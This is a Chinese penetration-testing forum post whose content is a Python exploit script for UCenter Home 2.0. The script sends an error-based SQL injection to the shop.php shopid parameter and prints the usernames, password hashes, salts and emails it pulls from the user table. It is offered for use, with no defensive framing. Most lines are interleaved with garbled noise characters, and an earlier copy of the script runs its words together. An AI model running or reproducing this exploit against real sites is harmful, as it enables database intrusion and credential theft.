中国网络渗透测试联盟

标题: UCenter Home 2.0 EXP [打印本页]
作者: admin    时间: 2013-1-23 09:18
标题: UCenter Home 2.0 EXP
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
$ q# }9 {% ]6 ]9 u$ ^
: ^3 N. Y( P- V  z& ~9 Q( f8 V/ E& F9 c- b
#!/usr/bin/env python  
: @0 |6 A" S" I/ {
( O/ y3 A( R; Uimport sys  
0 @9 d  w) L/ R& \. F: O7 Rimport urllib2  
3 G( H0 q6 I$ H+ [- d( ~* zimport re  3 K! D- r/ N# @7 \6 w

- y" G) v2 G, q& I6 @) qdef info():  
; i# L& J; |& T6 q    print 'From:http://www.exploit-db.com/exploits/14997/' ; b( ?+ f! s+ T' ^$ j
    print 'http://www.hake.cc/Web_loudong/'
: n5 e' {6 o3 p3 l6 S    print 'changed:qiaoy'  
* k( M! ~" b( `8 e    print 'exp:'  
( B: x  `4 X4 r! J    print ' ./UCenter_Home_2.0.py site'  
. J' ~6 R$ \3 W. q8 U. ] 8 B" V; \7 q3 I1 l# [; P
def main():  : z5 I! n1 B- u( S& o6 J  w( l
    if len(sys.argv) != 2:  
' P" A2 R1 d. e- A! e' n        info()  2 }+ f6 O5 I4 W3 A1 Z# b
    else:  ; x$ }- F3 }. J5 {% _" m9 o
        site = sys.argv[1]  
; E8 F  k% i5 m1 y. R        if site[0:7] == 'http://':  & p& M5 L3 O& H
            sitesite =site  7 M, M5 y, e8 r
        elif site[0:8] == 'https://':  
9 k; {6 g7 p0 R2 I% y# p) }            sitesite = site  ' n; s+ _! \" E* I& a
        else:  ! s, E; Y' ~; b! q
            site = 'http://'+site  
6 c/ ?" X  T7 K% }8 m* D        try:  
7 j* I! f6 o) S$ o% x, `            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  7 i7 X7 x/ o7 R9 ~
            Value = urllib2.urlopen(url).read()  
5 }- A0 f% Y/ L            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  + P# _$ |; X8 o
            hacked = Msg.split(':')  
$ R& q$ C' c, _8 n2 w+ |3 k            print 'Name:    '+hacked[1]  % w+ g/ y6 U  q! n8 T5 l* G1 S
            print 'Passwd:  '+hacked[2]  
# d: h5 D1 h4 V4 E' W) _9 G7 i8 T            print 'salt:    '+hacked[3]  4 ^4 x4 v5 g0 _6 [6 x( _2 [$ D
            print 'email:   '+hacked[4]  3 x/ L" g) s9 [% N8 U. j
        except:  
' b: \# ~+ a2 H' {+ M            print 'Sorry,I can\'t work............'  
/ s) Y) g$ h3 [3 [8 i, t0 D& x* E
) P$ _) C; I8 u7 k& Lif __name__ == '__main__':  . r( H% O! P  k1 \' S$ L, {  x
    main()



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2